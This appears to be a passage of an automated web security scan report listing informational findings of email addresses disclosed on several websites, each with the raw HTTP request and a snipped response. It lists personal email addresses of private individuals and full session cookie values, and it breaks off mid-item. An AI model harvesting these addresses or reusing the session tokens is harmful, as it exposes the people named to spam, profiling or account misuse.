<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:webmaster@humanconcepts.com">
...[SNIP]...

23.113. http://www.positioniseverything.net/abs_relbugs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positioniseverything.net
Path:   /abs_relbugs.html

Issue detail

The following email address was disclosed in the response:

Request

GET /abs_relbugs.html HTTP/1.1
Host: www.positioniseverything.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:21:06 GMT
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8a
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 10625

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


<title>Absolutely Buggy II&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</title>

<meta name="Big
...[SNIP]...
<a href="mailto:johnthebig66@yahoo.com">
...[SNIP]...

23.114. http://www.positioniseverything.net/easyclearing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positioniseverything.net
Path:   /easyclearing.html

Issue detail

The following email address was disclosed in the response:

Request

GET /easyclearing.html HTTP/1.1
Host: www.positioniseverything.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:21:07 GMT
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8a
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 24290

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


<title>Clearing a float container without source markup</title>

<meta http-equiv
...[SNIP]...
<a href="mailto:johnthebig66@yahoo.com">
...[SNIP]...

23.115. http://www.sfweekly.com/2010-08-11/news/ihelp-for-autism/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sfweekly.com
Path:   /2010-08-11/news/ihelp-for-autism/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /2010-08-11/news/ihelp-for-autism/ HTTP/1.1
Host: www.sfweekly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d Zend Core/2.5.0 PHP/5.2.4
X-Powered-By: Zend Core/2.5.0 PHP/5.2.4
Cache-Control: public, max-age=900, s-maxage=900
Pragma: cache
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Age: 57
Date: Thu, 03 Feb 2011 17:54:17 GMT
Expires: Thu, 03 Feb 2011 18:08:20 GMT
Content-Length: 263362
Connection: close


<!doctype html public "-//w3c//dtd html 4.01 transitional//en" "http://www.w3.org/tr/html4/loose.dtd">
<html>
<head>
<meta name='google-site-verification' content='JJc5K-OyKVMz5QCREOmr5SX-rsF
...[SNIP]...
e this. I'm also thinking of buying a few more, there is a family friends that have an Autism and I think this could help him much. I wish Apple will do the same thing on a larger scale.
Richard Fazio
RichardFazio@me.com</p>
...[SNIP]...
<p>Susan Hundy the Artist forgot to put email Address ............ s.hundy@bigpond.com for some free images</p>
...[SNIP]...

23.116. http://www.smartdevil.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartdevil.com
Path:   /Resources/Shared/scripts/DotNetNukeAjaxShared.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Resources/Shared/scripts/DotNetNukeAjaxShared.js HTTP/1.1
Host: www.smartdevil.com
Proxy-Connection: keep-alive
Referer: http://www.smartdevil.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; language=en-US; __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; __utmc=269707379; __utmb=269707379.1.10.1296764098

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 06 Nov 2010 20:16:22 GMT
Accept-Ranges: bytes
ETag: "5963c67aef7dcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:14:01 GMT
Content-Length: 10101

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this softwar
...[SNIP]...
<history>
   ''' Version 1.0.0: Feb. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' Version 1.0.1: Oct. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' </history>
...[SNIP]...

23.117. http://www.smartdevil.com/Resources/Shared/scripts/widgets.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartdevil.com
Path:   /Resources/Shared/scripts/widgets.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Resources/Shared/scripts/widgets.js HTTP/1.1
Host: www.smartdevil.com
Proxy-Connection: keep-alive
Referer: http://www.smartdevil.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; language=en-US; __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; __utmc=269707379; __utmb=269707379.1.10.1296764098

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 06 Nov 2010 20:16:22 GMT
Accept-Ranges: bytes
ETag: "a470c97aef7dcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:14:02 GMT
Content-Length: 11495

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and as
...[SNIP]...
<history>
''' Version 1.0.0: Oct. 16, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
''' </history>
...[SNIP]...

23.118. http://www.smartdevil.com/privacy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartdevil.com
Path:   /privacy.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy.aspx HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32669
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:22 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto:support@smartdevil.com">support@smartdevil.com</a>
...[SNIP]...

23.119. http://www.smartdevil.com/terms.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartdevil.com
Path:   /terms.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /terms.aspx HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49366
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:20 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<br>
SERVICE CONTACT : support@smartdevil.com<br>
...[SNIP]...

23.120. https://www.smartdevil.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /Resources/Shared/scripts/DotNetNukeAjaxShared.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Resources/Shared/scripts/DotNetNukeAjaxShared.js HTTP/1.1
Host: www.smartdevil.com
Connection: keep-alive
Referer: https://www.smartdevil.com/SSLLogin/tabid/116/Default.aspx?returnurl=%2fdefault.aspx
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; __utmc=269707379; __utmb=269707379.1.10.1296764098; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; language=en-US

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 06 Nov 2010 20:16:22 GMT
Accept-Ranges: bytes
ETag: "5963c67aef7dcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:24:34 GMT
Content-Length: 10101

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this softwar
...[SNIP]...
<history>
   ''' Version 1.0.0: Feb. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' Version 1.0.1: Oct. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' </history>
...[SNIP]...

23.121. https://www.smartdevil.com/Resources/Shared/scripts/widgets.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /Resources/Shared/scripts/widgets.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Resources/Shared/scripts/widgets.js HTTP/1.1
Host: www.smartdevil.com
Connection: keep-alive
Referer: https://www.smartdevil.com/SSLLogin/tabid/116/Default.aspx?returnurl=%2fdefault.aspx
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; __utmc=269707379; __utmb=269707379.1.10.1296764098; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; language=en-US

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 06 Nov 2010 20:16:22 GMT
Accept-Ranges: bytes
ETag: "a470c97aef7dcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:24:39 GMT
Content-Length: 11495

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and as
...[SNIP]...
<history>
''' Version 1.0.0: Oct. 16, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
''' </history>
...[SNIP]...

23.122. https://www.smartdevil.com/privacy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /privacy.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy.aspx HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32544
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:40 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto:support@smartdevil.com">support@smartdevil.com</a>
...[SNIP]...

23.123. https://www.smartdevil.com/terms.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.smartdevil.com
Path:   /terms.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /terms.aspx HTTP/1.1
Host: www.smartdevil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49241
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:40 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<br>
SERVICE CONTACT : support@smartdevil.com<br>
...[SNIP]...

23.124. http://www.supermedia.com/help/web-hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/web-hosting

Issue detail

The following email address was disclosed in the response:

Request

GET /help/web-hosting HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:34 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Site Hosting Help | SuperMedia.com Advertising</title>



...[SNIP]...
<br>
You may want a separate email for each employee, or just a few addresses for things like info@web-address.com or sales@web-address.com.</p>
...[SNIP]...

23.125. http://www.supermedia.com/press  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /press

Issue detail

The following email address was disclosed in the response:

Request

GET /press HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Press Releases | SuperMedia.com Advertising</title>



...[SNIP]...
<a href="mailto:andrew.shane@idearc.com">
...[SNIP]...

23.126. http://www.supermedia.com/press/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /press/

Issue detail

The following email address was disclosed in the response:

Request

GET /press/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:22:27 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Press Releases | SuperMedia.com Advertising</title>



...[SNIP]...
<a href="mailto:andrew.shane@idearc.com">
...[SNIP]...

23.127. http://www.supermedia.com/trust/privacy-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /trust/privacy-security

Issue detail

The following email address was disclosed in the response:

Request

GET /trust/privacy-security HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:26:02 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Privacy Policy | SuperMedia.com Advertising</title>



...[SNIP]...
<br>
If you have any questions about security on This Website, you can send us an email at spinfo@SuperMedia.com or contact Client Care at 1- 800-555-4833, Monday-Friday, 7am to 8pm CST. </p>
...[SNIP]...

23.128. http://www.supermedia.com/trust/terms-of-use  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /trust/terms-of-use

Issue detail

The following email address was disclosed in the response:

Request

GET /trust/terms-of-use HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:26:05 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Terms of Use | SuperMedia.com Advertising</title>



...[SNIP]...
<br>
Email: dmcanotices@supermedia.com <br>
...[SNIP]...

23.129. https://www.supermedia.com/ecommerce/basic-ecommerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/basic-ecommerce

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ecommerce/basic-ecommerce HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Basic Online Stores for Ecommerce | SuperMedia.com</title>



...[SNIP]...
"description" CONTENT="First time selling online? No worries! Our store builder tools make it easy set up your store in minutes. Includes a FREE domain name (www.yourbusiness.com), 15 email addresses (yourname@yourbusiness.com)...">
...[SNIP]...
</a>Email Addresses (name@yourbusiness.com)</div>
...[SNIP]...

23.130. https://www.supermedia.com/ecommerce/compare-ecommerce-options  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/compare-ecommerce-options

Issue detail

The following email address was disclosed in the response:

Request

GET /ecommerce/compare-ecommerce-options HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Compare Online Store Options | SuperMedia.com Advertising</title>



...[SNIP]...
</a>Email Addresses (name@yourbusiness.com)</div>
...[SNIP]...

23.131. https://www.supermedia.com/ecommerce/premium-ecommerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/premium-ecommerce

Issue detail

The following email address was disclosed in the response:

Request

GET /ecommerce/premium-ecommerce HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Premium Online Stores for Ecommerce | SuperMedia.com</title>



...[SNIP]...
</a>Email Addresses (name@yourbusiness.com)</div>
...[SNIP]...

23.132. https://www.supermedia.com/ecommerce/unlimited-ecommerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/unlimited-ecommerce

Issue detail

The following email address was disclosed in the response:

Request

GET /ecommerce/unlimited-ecommerce HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
